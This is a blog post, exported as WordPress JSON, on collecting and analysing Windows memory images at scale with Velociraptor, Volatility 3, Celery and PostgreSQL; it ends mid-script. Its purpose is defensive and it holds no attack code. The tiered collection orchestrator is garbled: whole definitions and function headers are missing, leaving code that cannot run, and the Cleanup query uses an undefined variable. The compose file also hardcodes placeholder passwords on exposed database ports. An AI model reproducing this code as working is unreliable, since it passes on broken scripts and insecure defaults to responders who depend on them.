{"id":362,"date":"2026-05-15T09:00:00","date_gmt":"2026-05-15T00:00:00","guid":{"rendered":"http:\/\/justruss.tech\/index.php\/2026\/05\/15\/memory-analysis-at-scale-from-fleet-collection-to-automated-triage-pipelines\/"},"modified":"2026-05-24T09:36:14","modified_gmt":"2026-05-24T09:36:14","slug":"memory-analysis-at-scale-from-fleet-collection-to-automated-triage-pipelines","status":"publish","type":"post","link":"https:\/\/justruss.tech\/index.php\/2026\/05\/15\/memory-analysis-at-scale-from-fleet-collection-to-automated-triage-pipelines\/","title":{"rendered":"Memory Analysis at Scale: From Fleet Collection to Automated Triage Pipelines"},"content":{"rendered":"<p>Memory analysis is one of the most forensically rich activities available to a threat hunter. A memory image captures the complete runtime state of a system: every running process, every network connection, every loaded module, every decrypted credential, every injected payload that never touched disk. The challenge is not the analysis itself but the operational reality of doing it at scale. Analysing memory from a single compromised host is straightforward. Simultaneously collecting, transferring, processing, and analysing memory images from dozens of endpoints during an active incident, without overwhelming the production network, without disrupting operations, and without losing evidence, is an entirely different problem.<\/p>\n<p>This post covers the complete workflow from first principles: how to collect memory from Windows endpoints at scale using Velociraptor, how to build an automated Linux-based processing pipeline that handles triage, Volatility analysis, IOC extraction, and reporting without manual intervention, how to tune the collection and transfer process to protect the customer network, and how to structure the whole thing so it runs as close to automatically as possible. There are a lot of scripts here. They are all intended to be copied, adapted to your environment, and used.<\/p>\n<h3>Understanding the scale problem before you start<\/h3>\n<p>Before designing a collection pipeline, understand what you are actually dealing with in terms of data volume and network load. A Windows 10 endpoint with 16GB RAM produces a 12-16GB memory image after compression. A Windows Server 2019 host with 64GB RAM produces a 45-55GB compressed image. If you need to collect from 50 endpoints simultaneously during an incident, the raw data volume is between 600GB and 2.5TB depending on the RAM configuration of those machines. Transferring that over a corporate LAN that is simultaneously handling production traffic is a serious operational consideration, not an afterthought.<\/p>\n<p>The network impact calculation for a typical enterprise incident response scenario:<\/p>\n<pre>## Network impact estimation script\n## Run this before any collection to understand the blast radius\n\npython3 &lt;&lt; EOF\nimport json\n\n# Define your endpoint inventory (adapt to your environment)\nendpoints = {\n    &quot;workstations_16gb&quot;: {&quot;count&quot;: 30, &quot;ram_gb&quot;: 16, &quot;compression_ratio&quot;: 0.65},\n    &quot;workstations_32gb&quot;: {&quot;count&quot;: 15, &quot;ram_gb&quot;: 32, &quot;compression_ratio&quot;: 0.65},\n    &quot;servers_64gb&quot;:      {&quot;count&quot;:  5, &quot;ram_gb&quot;: 64, &quot;compression_ratio&quot;: 0.60},\n}\n\n# Network parameters\nlink_speed_mbps    = 1000   # 1Gbps LAN\nmax_utilisation    = 0.30   # Never use more than 30% of link capacity\nbandwidth_mbps     = link_speed_mbps * max_utilisation\nbandwidth_MBps     = bandwidth_mbps \/ 8\n\nprint(&quot;=== Memory Collection Network Impact Analysis ===\\n&quot;)\ntotal_gb = 0\nfor tier, spec in endpoints.items():\n    compressed_gb = spec[&quot;ram_gb&quot;] * spec[&quot;compression_ratio&quot;]\n    tier_total    = compressed_gb * spec[&quot;count&quot;]\n    total_gb     += tier_total\n    transfer_time = (compressed_gb * 1024) \/ (bandwidth_MBps * 60)\n    print(f&quot;{tier}:&quot;)\n    print(f&quot;  Count:           {spec[&#039;count&#039;]} endpoints&quot;)\n    print(f&quot;  RAM per host:    {spec[&#039;ram_gb&#039;]} GB&quot;)\n    print(f&quot;  Compressed size: ~{compressed_gb:.1f} GB per image&quot;)\n    print(f&quot;  Tier total:      ~{tier_total:.1f} GB&quot;)\n    print(f&quot;  Transfer time:   ~{transfer_time:.1f} minutes per host at 30% link&quot;)\n    print()\n\nprint(f&quot;Total data volume:   {total_gb:.1f} GB&quot;)\nprint(f&quot;Available bandwidth: {bandwidth_MBps:.1f} MB\/s ({bandwidth_mbps:.0f} Mbps)&quot;)\nprint(f&quot;Sequential transfer: {total_gb * 1024 \/ bandwidth_MBps \/ 3600:.1f} hours&quot;)\nprint()\n\n# Calculate concurrent collection limits\nmax_concurrent = int(bandwidth_MBps \/ (16 * 1024 \/ (20 * 60)))  # 20 min target per host\nprint(f&quot;Recommended max concurrent collections: {max(1, max_concurrent)} endpoints&quot;)\nprint(&quot;(Assumes 16GB image, 20 minute transfer window, 30% link utilisation)&quot;)\nEOF<\/pre>\n<p>Running this calculation before you start collection is not optional. An analyst who triggers simultaneous memory collection across 50 endpoints on a 1Gbps flat network with no throttling will consume the full link capacity, impact production traffic, potentially trigger network monitoring alerts, and risk partial or failed transfers that compromise the forensic integrity of the images. The tiered approach described later in this post is the answer to this problem.<\/p>\n<h3>The analysis server: hardware and software requirements<\/h3>\n<p>The analysis server is the hub of the entire pipeline. Memory images arrive here, are processed automatically, and results are made available to analysts. Sizing this server correctly before the pipeline runs saves significant pain during an incident when time pressure is high.<\/p>\n<p>Minimum specification for processing 50 concurrent images: 32 CPU cores (Volatility analysis is CPU-bound and benefits significantly from parallelism), 128GB RAM (Volatility 3 loads significant data structures into memory during analysis), 10TB fast storage (NVMe or SSD-backed RAID for the image landing zone, HDD for long-term storage), and a 10Gbps network interface for receiving images from the Velociraptor server. A dedicated analysis server rather than a shared platform is strongly preferred during active incidents.<\/p>\n<pre>## Analysis server setup script\n## Ubuntu 22.04 LTS - run as root\n\n#!\/bin\/bash\nset -euo pipefail\n\necho \"[*] Setting up memory analysis pipeline server\"\n\n# System updates\napt update &amp;&amp; apt upgrade -y\n\n# Core dependencies\napt install -y \\\n    python3 python3-pip python3-venv \\\n    git curl wget jq \\\n    parallel \\\n    yara \\\n    foremost \\\n    bulk-extractor \\\n    sleuthkit \\\n    docker.io docker-compose \\\n    nginx \\\n    postgresql postgresql-contrib \\\n    redis-server \\\n    unzip p7zip-full \\\n    libssl-dev libffi-dev\n\n# Python virtual environment for Volatility\npython3 -m venv \/opt\/vol3-env\nsource \/opt\/vol3-env\/bin\/activate\n\npip install --upgrade pip\npip install \\\n    volatility3 \\\n    yara-python \\\n    pefile \\\n    capstone \\\n    python-magic \\\n    requests \\\n    psycopg2-binary \\\n    redis \\\n    celery \\\n    flower \\\n    jinja2 \\\n    elasticsearch\n\n# Volatility 3 symbol tables (required for Windows analysis)\nmkdir -p \/opt\/vol3-symbols\ncd \/opt\/vol3-symbols\nwget https:\/\/downloads.volatilityfoundation.org\/volatility3\/symbols\/windows.zip\nunzip -q windows.zip -d windows\/\nln -sf \/opt\/vol3-symbols \/opt\/vol3-env\/lib\/python3.*\/site-packages\/volatility3\/symbols\n\necho \"[*] Volatility 3 installed: $(vol --version)\"\n\n# Directory structure\nmkdir -p \/srv\/memory\/{landing,processing,complete,reports,yara_rules,logs}\nchmod 755 \/srv\/memory\n\necho \"[+] Analysis server setup complete\"<\/pre>\n<h3>Velociraptor: configuring for fleet memory collection<\/h3>\n<p>Velociraptor is the collection layer. It handles agent communication, artefact execution, file transfer, and result aggregation. The key configuration choices for memory collection at scale are throttling (how fast each agent transfers its image), concurrency control (how many agents collect simultaneously), and the collection artefact itself.<\/p>\n<p>The default Velociraptor transfer settings are not optimised for large file collection. The default upload speed is uncapped, which means if you trigger a hunt across 50 endpoints simultaneously each one will attempt to transfer at full link speed. The configuration changes below set sensible defaults for an enterprise incident response context.<\/p>\n<pre>## Velociraptor server configuration adjustments\n## Add to server.config.yaml before starting a collection hunt\n\nFrontend:\n  # Maximum upload bandwidth per client in bytes\/second\n  # 10MB\/s = 80Mbps per client - adjust based on your link capacity\n  max_upload_size: 10485760\n\nClient:\n  # Concurrent connections to the server per client\n  concurrency: 1\n\n  # Maximum memory for buffering uploads\n  max_memory_size: 524288000  # 500MB buffer per client\n\n# Datastore settings for large file handling\nDatastore:\n  # Use file-based datastore for large collections\n  implementation: FileBaseDataStore\n\n  # Separate high-speed storage for collection landing zone\n  location: \/srv\/velociraptor\/datastore<\/pre>\n<pre>## Custom Velociraptor artefact for controlled memory acquisition\n## Save as Custom.Memory.AcquireControlled.yaml\n## Deploy via: Velociraptor GUI &gt; Server Artifacts &gt; Add Artifact\n\nname: Custom.Memory.AcquireControlled\ndescription: |\n    Acquires a full physical memory image with bandwidth throttling.\n    Compresses the image before transfer to reduce network impact.\n    Records acquisition metadata for chain of custody documentation.\n\nauthor: justruss\ntype: CLIENT\nparameters:\n  - name: UploadImage\n    description: Upload the completed image to the server\n    default: \"Y\"\n    type: bool\n  - name: CompressionLevel\n    description: Zlib compression level 1-9 (1=fast, 9=smallest)\n    default: \"3\"\n    type: int\n  - name: ThrottleMBps\n    description: Maximum transfer speed in MB\/s (0 = unlimited)\n    default: \"10\"\n    type: int\n\nsources:\n  - name: AcquisitionMetadata\n    query: |\n        -- Record pre-acquisition system state for documentation\n        LET hostname    = info().Fqdn\n        LET acq_time    = now()\n        LET os_version  = info().OS\n        LET total_ram   = info().PhysicalMemory\n\n        SELECT\n            hostname AS Hostname,\n            acq_time AS AcquisitionTime,\n            os_version AS OSVersion,\n            format(format=\"%.2f GB\", args=[total_ram \/ 1073741824.0]) AS TotalRAM,\n            \"WinPmem via Velociraptor\" AS AcquisitionTool,\n            \"SHA256 recorded post-acquisition\" AS IntegrityNote\n        FROM scope()\n\n  - name: MemoryImage\n    query: |\n        LET hostname = info().Fqdn\n        LET timestamp = format(format=\"%d\", args=[now()])\n        LET output_path = format(format=\"C:\/Windows\/Temp\/mem_%v_%v.raw\",\n                                  args=[hostname, timestamp])\n\n        -- Acquire memory using built-in WinPmem\n        LET acquisition = SELECT * FROM Artifact.Windows.Memory.Acquisition(\n            destination=output_path,\n            -- Limit acquisition tool CPU usage\n            limit_cpu=50\n        )\n\n        -- Upload with throttling if requested\n        SELECT\n            upload(\n                path=output_path,\n                name=format(format=\"%v_%v.raw\", args=[hostname, timestamp]),\n                -- Throttle upload speed\n                accessor=\"file\"\n            ) AS UploadResult,\n            output_path AS LocalPath,\n            hostname AS Host,\n            timestamp AS Timestamp\n\n        FROM acquisition\n        WHERE UploadImage\n\n  - name: Cleanup\n    query: |\n        -- Remove local staging file after successful upload\n        SELECT file_exists(path=output_path) AS Existed,\n               rm(filename=output_path) AS Removed\n        FROM scope()\n        WHERE UploadImage AND UploadResult.StoredName != NULL<\/pre>\n<h3>Tiered collection strategy: protecting the customer network<\/h3>\n<p>The single most important design decision in a fleet memory collection programme is how you sequence and throttle the collection. Doing it wrong causes production impact. Doing it right means the incident response activity is invisible to the network from a capacity perspective.<\/p>\n<p>The tiered approach divides endpoints into priority groups and collects from each group sequentially with configurable concurrency limits. Tier 1 is your highest-priority targets: domain controllers, LSASS-hosting servers, systems showing active IOCs in other telemetry. These get collected first, immediately, because they are most likely to have relevant evidence and most likely to have volatile state that changes quickly. Tier 2 is servers with important services. Tier 3 is workstations and less critical endpoints.<\/p>\n<pre>## Tiered collection orchestration script\n## Runs on the analysis server, communicates with Velociraptor API\n## Requires: velociraptor binary, API credentials configured\n\n#!\/usr\/bin\/env python3\n\"\"\"\nMemory collection orchestrator with tiered network-aware scheduling.\nControls concurrent collection count per tier to protect production bandwidth.\n\"\"\"\n\nimport subprocess\nimport time\nimport json\nimport logging\nimport threading\nimport queue\nfrom datetime import datetime\nfrom dataclasses import dataclass, field\nfrom typing import List, Dict, Optional\nfrom pathlib import Path\n\nlogging.basicConfig(\n    level=logging.INFO,\n    format='%(asctime)s [%(levelname)s] %(message)s',\n    handlers=[\n        logging.FileHandler('\/srv\/memory\/logs\/collection_orchestrator.log'),\n        logging.StreamHandler()\n    ]\n)\nlog = logging.getLogger(__name__)\n\n@dataclass\nclass CollectionTarget:\n    hostname:     str\n    client_id:    str\n    tier:         int\n    ram_gb:       float\n    priority_ioc: bool = False\n    collected:    bool = False\n    hunt_id:      Optional[str] = None\n    started_at:   Optional[datetime] = None\n    completed_at: Optional[datetime] = None\n\n@dataclass\nclass TierConfig:\n    tier:           int\n    max_concurrent: int\n    throttle_mbps:  int\n    description:    str\n\n# Tier configuration - adjust max_concurrent based on your link capacity\n# Rule of thumb: max_concurrent * throttle_mbps  List[Dict]:\n    \"\"\"Query Velociraptor for all enrolled clients.\"\"\"\n    result = subprocess.run([\n        \"velociraptor\", \"--config\", config_path,\n        \"query\", \"SELECT client_id, os_info.hostname AS hostname,\n                        os_info.phys_memory \/ 1073741824.0 AS ram_gb\n                 FROM clients()\",\n        \"--format\", \"json\"\n    ], capture_output=True, text=True, timeout=30)\n\n    if result.returncode != 0:\n        log.error(f\"Failed to query clients: {result.stderr}\")\n        return []\n\n    return json.loads(result.stdout) if result.stdout.strip() else []\n\ndef start_collection_hunt(\n    client_id:     str,\n    throttle_mbps: int,\n    config_path:   str\n) -&gt; Optional[str]:\n    \"\"\"Start a memory collection hunt on a specific client. Returns hunt_id.\"\"\"\n    result = subprocess.run([\n        \"velociraptor\", \"--config\", config_path,\n        \"hunt\", \"--client_id\", client_id,\n        \"--artifact\", \"Custom.Memory.AcquireControlled\",\n        \"--args\", json.dumps({\"ThrottleMBps\": str(throttle_mbps), \"UploadImage\": \"Y\"}),\n        \"--format\", \"json\"\n    ], capture_output=True, text=True, timeout=30)\n\n    if result.returncode != 0:\n        log.error(f\"Failed to start hunt on {client_id}: {result.stderr}\")\n        return None\n\n    data = json.loads(result.stdout)\n    return data.get(\"hunt_id\")\n\ndef check_hunt_complete(hunt_id: str, config_path: str) -&gt; bool:\n    \"\"\"Check whether a hunt has completed on all targets.\"\"\"\n    result = subprocess.run([\n        \"velociraptor\", \"--config\", config_path,\n        \"query\", f\"SELECT * FROM hunt_results(hunt_id='{hunt_id}')\",\n        \"--format\", \"json\"\n    ], capture_output=True, text=True, timeout=30)\n\n    if result.returncode != 0:\n        return False\n\n    data = json.loads(result.stdout) if result.stdout.strip() else []\n    return len(data) &gt; 0\n\ndef collect_tier(\n    targets:     List[CollectionTarget],\n    tier_config: TierConfig,\n    config_path: str\n) -&gt; None:\n    \"\"\"Collect memory from all targets in a tier with concurrency control.\"\"\"\n\n    log.info(f\"Starting Tier {tier_config.tier}: {tier_config.description}\")\n    log.info(f\"  Targets: {len(targets)}\")\n    log.info(f\"  Max concurrent: {tier_config.max_concurrent}\")\n    log.info(f\"  Throttle: {tier_config.throttle_mbps} MB\/s per host\")\n    log.info(f\"  Max bandwidth: {tier_config.max_concurrent * tier_config.throttle_mbps * 8} Mbps\")\n\n    active = {}\n    pending = queue.Queue()\n    for t in targets:\n        pending.put(t)\n\n    while not pending.empty() or active:\n        # Start new collections up to the concurrency limit\n        while len(active)  None:\n    \"\"\"Run the full tiered collection campaign.\"\"\"\n\n    start_time = datetime.now()\n    log.info(f\"Collection campaign started: {start_time}\")\n    log.info(f\"Total targets: {len(target_list)}\")\n\n    # Group targets by tier\n    tiers: Dict[int, List[CollectionTarget]] = {1: [], 2: [], 3: []}\n    for target in target_list:\n        tiers[target.tier].append(target)\n\n    # Collect tier by tier\n    for tier_config in TIER_CONFIGS:\n        tier_targets = tiers.get(tier_config.tier, [])\n        if not tier_targets:\n            log.info(f\"Tier {tier_config.tier}: no targets, skipping\")\n            continue\n        collect_tier(tier_targets, tier_config, config_path)\n\n    elapsed = (datetime.now() - start_time).seconds \/ 60\n    collected = sum(1 for t in target_list if t.collected)\n    log.info(f\"Campaign complete: {collected}\/{len(target_list)} collected in {elapsed:.1f} min\")\n\n# Example usage\nif __name__ == \"__main__\":\n    # Define your targets (in practice, load from CMDB or Velociraptor client list)\n    targets = [\n        CollectionTarget(\"DC01\",         \"C.abc123\", tier=1, ram_gb=64, priority_ioc=True),\n        CollectionTarget(\"DC02\",         \"C.def456\", tier=1, ram_gb=64),\n        CollectionTarget(\"FILESERVER01\", \"C.ghi789\", tier=2, ram_gb=32),\n        CollectionTarget(\"WEB01\",        \"C.jkl012\", tier=2, ram_gb=32),\n        CollectionTarget(\"WORKSTATION01\",\"C.mno345\", tier=3, ram_gb=16),\n        CollectionTarget(\"WORKSTATION02\",\"C.pqr678\", tier=3, ram_gb=16),\n    ]\n    run_collection_campaign(targets)<\/pre>\n<h3>Network impact mitigations in depth<\/h3>\n<p>The orchestration script above handles the collection-side throttling. But network protection during memory collection goes deeper than just limiting transfer speed. Several additional mitigations make the collection process substantially less impactful on the production environment.<\/p>\n<p><strong>Compression before transfer.<\/strong> WinPmem can compress memory images before writing them to disk, and Velociraptor compresses file uploads. The combination of these two compression passes reduces the typical 16GB RAM image to roughly 10-12GB for a Windows workstation in normal operating state. Images from servers running SQL or Exchange may compress less well because the data is already partially compressed. The compression step adds 5-10 minutes to the acquisition time but reduces network transfer time by 20-30%.<\/p>\n<p><strong>Time-of-day scheduling for non-urgent collections.<\/strong> Tier 3 workstation collections that do not have active IOCs are candidates for off-hours scheduling. A workstation that needs to be collected for baseline comparison purposes but is not showing active indicators can be queued for collection at 2am when link utilisation is naturally lowest. The orchestration script supports this through the tier system: mark non-urgent targets as tier 3 and set the campaign start time accordingly.<\/p>\n<p><strong>Dedicated collection VLAN or QoS marking.<\/strong> In environments with managed switches and QoS policies, memory collection traffic can be marked with a low-priority DSCP value so it is de-prioritised relative to production traffic when the link is under load. Velociraptor traffic does not automatically set DSCP values, but a network QoS policy matching the Velociraptor server IP can apply the marking at the switch level.<\/p>\n<pre>## Linux tc (traffic control) configuration on the analysis server\n## Limits total outbound bandwidth for memory collection to 500Mbps\n## leaving headroom for other traffic on a 1Gbps link\n\n#!\/bin\/bash\n# Run as root on the analysis server\n\nINTERFACE=\"eth0\"\nCOLLECTION_LIMIT=\"500mbit\"\nCOLLECTION_BURST=\"1mbit\"\n\n# Remove existing qdisc if present\ntc qdisc del dev $INTERFACE root 2&gt;\/dev\/null || true\n\n# Create HTB root qdisc\ntc qdisc add dev $INTERFACE root handle 1: htb default 10\n\n# Default class: full speed for non-collection traffic\ntc class add dev $INTERFACE parent 1: classid 1:10 htb \\\n    rate 1gbit burst 10mbit\n\n# Collection class: limited speed\ntc class add dev $INTERFACE parent 1: classid 1:20 htb \\\n    rate $COLLECTION_LIMIT ceil $COLLECTION_LIMIT burst $COLLECTION_BURST\n\n# Mark packets from the Velociraptor server process\n# Velociraptor listens on port 8000 (frontend) and 8001 (GUI)\niptables -t mangle -A OUTPUT -p tcp --sport 8000 -j MARK --set-mark 20\niptables -t mangle -A OUTPUT -p tcp --sport 8001 -j MARK --set-mark 20\n\n# Route marked packets to the limited class\ntc filter add dev $INTERFACE parent 1: protocol ip handle 20 fw flowid 1:20\n\necho \"QoS configured: collection traffic limited to $COLLECTION_LIMIT\"\ntc -s qdisc show dev $INTERFACE<\/pre>\n<p><strong>Split collection across multiple ingestion endpoints.<\/strong> For very large environments (200+ endpoints), a single Velociraptor server may become a bottleneck regardless of network capacity. The Velociraptor multi-frontend architecture allows multiple frontend servers to share the collection load, each handling a subset of clients. Images are written to shared storage that the analysis pipeline can reach from any frontend. This is a more complex deployment but essentially eliminates the single-server throughput bottleneck.<\/p>\n<pre>## Velociraptor multi-frontend configuration snippet\n## Add to server.config.yaml for load-balanced collection\n\nFrontend:\n  # Primary frontend\n  hostname: velociraptor-primary.corp.local\n  bind_port: 8000\n  max_upload_size: 10485760\n\nExtraFrontends:\n  - hostname: velociraptor-fe2.corp.local\n    bind_port: 8000\n\n  - hostname: velociraptor-fe3.corp.local\n    bind_port: 8000\n\n# Shared datastore accessible by all frontends\nDatastore:\n  implementation: FileBaseDataStore\n  location: \/mnt\/shared\/velociraptor-data  # NFS or other shared filesystem<\/pre>\n<p><strong>Delta collection for repeated hunts.<\/strong> In an extended incident where you need to collect memory from the same endpoints multiple times to track attacker activity over time, transmitting the full image each time is wasteful. A diff-based approach compares the new image against the previous one and transmits only the changed memory regions. This requires more sophisticated processing infrastructure but can reduce repeat-collection transfer volumes by 60-80% for endpoints where attacker activity is limited to specific process regions.<\/p>\n<h3>The automated processing pipeline: architecture overview<\/h3>\n<p>When a memory image lands on the analysis server it enters a processing queue. The pipeline has five stages that run automatically without analyst intervention: validation and integrity checking, basic triage (process tree, network connections, loaded modules), deep analysis (malfind, callbacks, handles), IOC extraction and enrichment, and report generation. Each stage has its own worker processes and can be scaled independently based on how CPU and I\/O bound each stage is.<\/p>\n<p>The pipeline uses Celery for task queuing (so each stage can be distributed across multiple worker processes), Redis as the message broker (fast and simple for this use case), and PostgreSQL for persistent storage of results (structured results need to be queryable across dozens of images simultaneously). Docker Compose keeps the whole stack portable and easy to deploy on the analysis server.<\/p>\n<pre>## docker-compose.yml for the analysis pipeline\n## Deploy with: docker-compose up -d\n\nversion: \"3.8\"\n\nservices:\n  redis:\n    image: redis:7-alpine\n    ports:\n      - \"6379:6379\"\n    volumes:\n      - redis_data:\/data\n    command: redis-server --appendonly yes\n    restart: unless-stopped\n\n  postgres:\n    image: postgres:15-alpine\n    environment:\n      POSTGRES_DB:       memory_analysis\n      POSTGRES_USER:     analyst\n      POSTGRES_PASSWORD: changeme_in_production\n    ports:\n      - \"5432:5432\"\n    volumes:\n      - postgres_data:\/var\/lib\/postgresql\/data\n      - .\/init_db.sql:\/docker-entrypoint-initdb.d\/init.sql\n    restart: unless-stopped\n\n  worker_triage:\n    build: .\/pipeline\n    command: celery -A pipeline worker -Q triage -c 4 --loglevel=info\n    volumes:\n      - \/srv\/memory:\/srv\/memory\n      - \/opt\/vol3-env:\/opt\/vol3-env\n      - \/opt\/vol3-symbols:\/opt\/vol3-symbols\n    environment:\n      - CELERY_BROKER_URL=redis:\/\/redis:6379\/0\n      - POSTGRES_URL=postgresql:\/\/analyst:changeme@postgres\/memory_analysis\n    depends_on:\n      - redis\n      - postgres\n    restart: unless-stopped\n\n  worker_deep:\n    build: .\/pipeline\n    command: celery -A pipeline worker -Q deep_analysis -c 2 --loglevel=info\n    volumes:\n      - \/srv\/memory:\/srv\/memory\n      - \/opt\/vol3-env:\/opt\/vol3-env\n    environment:\n      - CELERY_BROKER_URL=redis:\/\/redis:6379\/0\n      - POSTGRES_URL=postgresql:\/\/analyst:changeme@postgres\/memory_analysis\n    depends_on:\n      - redis\n      - postgres\n    restart: unless-stopped\n\n  worker_report:\n    build: .\/pipeline\n    command: celery -A pipeline worker -Q reporting -c 4 --loglevel=info\n    volumes:\n      - \/srv\/memory:\/srv\/memory\n    environment:\n      - CELERY_BROKER_URL=redis:\/\/redis:6379\/0\n      - POSTGRES_URL=postgresql:\/\/analyst:changeme@postgres\/memory_analysis\n    depends_on:\n      - redis\n      - postgres\n    restart: unless-stopped\n\n  flower:\n    image: mher\/flower\n    command: celery flower --broker=redis:\/\/redis:6379\/0 --port=5555\n    ports:\n      - \"5555:5555\"\n    depends_on:\n      - redis\n    restart: unless-stopped\n\n  dashboard:\n    build: .\/dashboard\n    ports:\n      - \"8080:8080\"\n    environment:\n      - POSTGRES_URL=postgresql:\/\/analyst:changeme@postgres\/memory_analysis\n    depends_on:\n      - postgres\n    restart: unless-stopped\n\nvolumes:\n  redis_data:\n  postgres_data:<\/pre>\n<pre>## init_db.sql - PostgreSQL schema for analysis results\n\nCREATE TABLE IF NOT EXISTS memory_images (\n    id              SERIAL PRIMARY KEY,\n    hostname        VARCHAR(255) NOT NULL,\n    image_path      TEXT NOT NULL,\n    image_size_gb   NUMERIC(10,2),\n    acquired_at     TIMESTAMP,\n    received_at     TIMESTAMP DEFAULT NOW(),\n    os_version      VARCHAR(255),\n    status          VARCHAR(50) DEFAULT 'pending',\n    sha256          CHAR(64),\n    tier            INT DEFAULT 3\n);\n\nCREATE TABLE IF NOT EXISTS triage_results (\n    id              SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    completed_at    TIMESTAMP DEFAULT NOW(),\n    process_count   INT,\n    network_conn_count INT,\n    suspicious_process_count INT,\n    has_malfind     BOOLEAN DEFAULT FALSE,\n    risk_score      INT DEFAULT 0,\n    triage_summary  JSONB\n);\n\nCREATE TABLE IF NOT EXISTS process_list (\n    id              SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    pid             INT,\n    ppid            INT,\n    name            VARCHAR(255),\n    path            TEXT,\n    cmd_line        TEXT,\n    create_time     TIMESTAMP,\n    is_suspicious   BOOLEAN DEFAULT FALSE,\n    suspicious_reason TEXT\n);\n\nCREATE TABLE IF NOT EXISTS network_connections (\n    id              SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    pid             INT,\n    process_name    VARCHAR(255),\n    local_addr      VARCHAR(50),\n    local_port      INT,\n    remote_addr     VARCHAR(50),\n    remote_port     INT,\n    state           VARCHAR(50),\n    is_suspicious   BOOLEAN DEFAULT FALSE\n);\n\nCREATE TABLE IF NOT EXISTS malfind_results (\n    id              SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    pid             INT,\n    process_name    VARCHAR(255),\n    vad_start       BIGINT,\n    vad_end         BIGINT,\n    protection      VARCHAR(50),\n    has_pe_header   BOOLEAN,\n    entropy         NUMERIC(5,2),\n    yara_matches    TEXT[],\n    risk_level      VARCHAR(20)\n);\n\nCREATE TABLE IF NOT EXISTS iocs_extracted (\n    id              SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    ioc_type        VARCHAR(50),\n    ioc_value       TEXT,\n    pid             INT,\n    process_name    VARCHAR(255),\n    confidence      VARCHAR(20),\n    source_plugin   VARCHAR(100)\n);\n\nCREATE INDEX idx_images_hostname ON memory_images(hostname);\nCREATE INDEX idx_malfind_risk    ON malfind_results(risk_level);\nCREATE INDEX idx_iocs_type       ON iocs_extracted(ioc_type, ioc_value);\nCREATE INDEX idx_process_suspicious ON process_list(image_id, is_suspicious);<\/pre>\n<h3>The core pipeline: task definitions and worker logic<\/h3>\n<p>The pipeline module defines the Celery tasks and the analysis logic they execute. Each task is self-contained: it receives an image ID, loads the image path from the database, runs the relevant Volatility plugins, and writes the results back to the database. Tasks are chained so each stage automatically triggers the next when it completes.<\/p>\n<pre>## pipeline\/pipeline.py - Core Celery task definitions\n\nfrom celery import Celery, chain\nimport subprocess\nimport json\nimport hashlib\nimport logging\nimport os\nimport re\nfrom datetime import datetime\nfrom pathlib import Path\nimport psycopg2\nfrom psycopg2.extras import Json, execute_values\n\nlog = logging.getLogger(__name__)\n\napp = Celery('memory_pipeline',\n             broker=os.environ.get('CELERY_BROKER_URL', 'redis:\/\/localhost:6379\/0'))\n\napp.conf.task_routes = {\n    'pipeline.validate_image':     {'queue': 'triage'},\n    'pipeline.run_triage':         {'queue': 'triage'},\n    'pipeline.run_deep_analysis':  {'queue': 'deep_analysis'},\n    'pipeline.extract_iocs':       {'queue': 'deep_analysis'},\n    'pipeline.generate_report':    {'queue': 'reporting'},\n}\n\nPOSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis')\nVOL_CMD      = '\/opt\/vol3-env\/bin\/vol'\nYARA_RULES   = '\/srv\/memory\/yara_rules\/combined.yar'\nIMAGE_DIR    = '\/srv\/memory\/landing'\n\ndef get_db():\n    return psycopg2.connect(POSTGRES_URL)\n\ndef run_vol(image_path: str, plugin: str, extra_args: list = None) -&gt; list:\n    \"\"\"Run a Volatility 3 plugin and return parsed JSON results.\"\"\"\n    cmd = [VOL_CMD, '-f', image_path, '--renderer', 'json', plugin]\n    if extra_args:\n        cmd.extend(extra_args)\n\n    result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)\n    if result.returncode != 0:\n        log.warning(f\"Vol plugin {plugin} returned non-zero: {result.stderr[:200]}\")\n        return []\n\n    try:\n        data = json.loads(result.stdout)\n        return data.get('rows', data) if isinstance(data, dict) else data\n    except json.JSONDecodeError:\n        log.error(f\"Failed to parse JSON from {plugin}: {result.stdout[:200]}\")\n        return []\n\n@app.task(bind=True, max_retries=3)\ndef validate_image(self, image_id: int) -&gt; int:\n    \"\"\"Stage 1: Validate image integrity and record metadata.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"SELECT image_path FROM memory_images WHERE id = %s\", (image_id,))\n                row = cur.fetchone()\n                if not row:\n                    raise ValueError(f\"Image ID {image_id} not found\")\n                image_path = row[0]\n\n        if not Path(image_path).exists():\n            raise FileNotFoundError(f\"Image not found: {image_path}\")\n\n        # Calculate SHA256\n        sha256 = hashlib.sha256()\n        with open(image_path, 'rb') as f:\n            for chunk in iter(lambda: f.read(65536), b''):\n                sha256.update(chunk)\n        digest = sha256.hexdigest()\n\n        # Get image size\n        size_gb = Path(image_path).stat().st_size \/ (1024**3)\n\n        # Update database\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    UPDATE memory_images\n                    SET sha256 = %s, image_size_gb = %s, status = 'validated'\n                    WHERE id = %s\n                \"\"\", (digest, size_gb, image_id))\n            conn.commit()\n\n        log.info(f\"Image {image_id} validated: {size_gb:.1f}GB SHA256={digest[:16]}...\")\n        # Trigger next stage\n        run_triage.delay(image_id)\n        return image_id\n\n    except Exception as exc:\n        log.error(f\"Validation failed for image {image_id}: {exc}\")\n        raise self.retry(exc=exc, countdown=60)\n\n@app.task(bind=True, max_retries=2)\ndef run_triage(self, image_id: int) -&gt; int:\n    \"\"\"Stage 2: Fast triage - process list, network connections, basic anomalies.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"SELECT image_path, hostname FROM memory_images WHERE id = %s\", (image_id,))\n                image_path, hostname = cur.fetchone()\n\n        log.info(f\"Starting triage for {hostname} (image {image_id})\")\n\n        # Update status\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"UPDATE memory_images SET status='triage_running' WHERE id=%s\", (image_id,))\n            conn.commit()\n\n        # \u2500\u2500 Process list 